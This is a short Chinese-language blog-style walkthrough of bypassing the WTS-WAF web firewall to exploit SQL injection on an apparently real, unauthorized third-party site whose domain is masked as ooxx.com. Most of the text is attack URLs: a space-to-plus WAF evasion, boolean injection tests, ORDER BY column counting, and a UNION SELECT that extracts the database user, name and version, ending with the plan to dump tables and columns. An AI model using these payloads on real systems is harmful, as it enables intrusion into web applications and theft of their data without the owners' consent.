绕过WTS-WAF进行sql注入

---

1. 偶然看到一个网站存在sql注入，但是有waf，随手测试就绕过了，很简单的绕过姿势。(全程打马)

http://www.ooxx.com/news_blank.php?id=297 and 1=1

1.jpg

2. 很明显语句被拦截了

http://www.ooxx.com/news_blank.php?id=297+and+1=1

2.jpg

http://www.ooxx.com/news_blank.php?id=297+and+1=2

3.jpg

3. 判断出此处确定存在sql注入，接下来就是猜解列数 order by

4. 利用二分法 order by 11正常，order by 12错误，存在11个字段

4.jpg 5.jpg

5. 然后进行联合查询

http://www.ooxx.com/news_blank.php?id=297+and+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11

6.jpg

6. 箭头指向的就是爆出的显示位

http://www.ooxx.com/news_blank.php?id=297+and+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),9,10,11

7.jpg

成功爆出数据库，接下来爆表，爆列，字段。。。。。

8.jpg